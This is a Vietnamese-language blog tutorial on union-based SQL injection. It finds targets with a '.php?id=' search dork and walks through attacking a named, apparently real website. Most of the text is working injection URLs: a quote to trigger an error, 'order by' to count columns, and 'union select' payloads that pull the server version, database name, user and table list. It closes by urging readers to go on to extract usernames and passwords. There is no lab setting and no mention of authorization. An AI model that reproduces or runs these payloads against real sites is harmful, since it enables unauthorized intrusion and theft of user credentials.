Tutorial Sql Injection sử dụng câu lệnh Select

sql injection

GOOGLE TÌM KIẾM TỪ KHÓA .php?id=

Lấy được link web sau http://www.ubraintv.com/watchchannel.php?id=6

Thêm vào cuối liên kết trên một trong các meta character đã nói ở trên, chẳng hạn ta thêm vào dấu nháy đơn( hoặc dấu – ,+,vv)

http://www.ubraintv.com/watchchannel.php?id=6

Tutorial Sql Injection sử dụng câu lệnh Select

THÔNG BÁO LỖI TỪ MYSQL SERVER HIỆN RA .

**THU THẬP THÔNG TIN **

Như hình trên chúng ta thấy database web này xài MySQL

Ta bắt đầu xác định số cột (column) , ta mò random

http://www.ubraintv.com/watchchannel.php?id=6’ order by 1– –

Mò được tới

http://www.ubraintv.com/watchchannel.php?id=6’ order by 8– –

gặp lỗi

Tutorial Sql Injection sử dụng câu lệnh Select

Vậy suy ra có 7 cột từ 1->7

Sau khi lấy được các thông tin cơ bản, chúng ta sẽ tiến hành khai thác SQL injection để lấy cơ sở dữ liệu hay thực hiện những hành vi khác thông qua lỗ hổng này. Ta tìm cột lỗi thôi

http://www.ubraintv.com/watchchannel.php?id=6’ union select 1,2,3,4,5,6,7– –

Tutorial Sql Injection sử dụng câu lệnh Select

Ta sẽ khai thác vào 2 điểm hỏng này .

Lấy version và tên database

http://www.ubraintv.com/watchchannel.php?id=6’ union select 1,version(),3,database(),5,6,7– –

Tutorial Sql Injection sử dụng câu lệnh Select

Vesion 5.1.73

Tên Data ubraintv

Ta sẽ tiến hành them khai thác user ()

http://www.ubraintv.com/watchchannel.php?id=6’ union select 1,user(),3,4, 5,6,7– –

Tutorial Sql Injection sử dụng câu lệnh Select

Tiếp tục khai thác thông tin các bảng .

http://www.ubraintv.com/watchchannel.php?id=6’union select 1,unhex(hex(group_concat(table_name))),3,4,5,6,7 from information_schema.tables where table_name = database()– –

Tutorial Sql Injection sử dụng câu lệnh Select

KHI ĐÃ CÓ CÁC BẢNG BẠN CỨ TRUY VẤN TIẾP NHỮNG THÔNG TIN MÌNH CẦN LẤY NHƯ USERNAME HAY PASSWORD…. Cảm ơn các bạn đã xem bài .

Xem thêm: Tìm hiểu về mã độc gián điệp FlawedAmmyy P1

BÌNH LUẬN

Please enter your comment!
Please enter your name here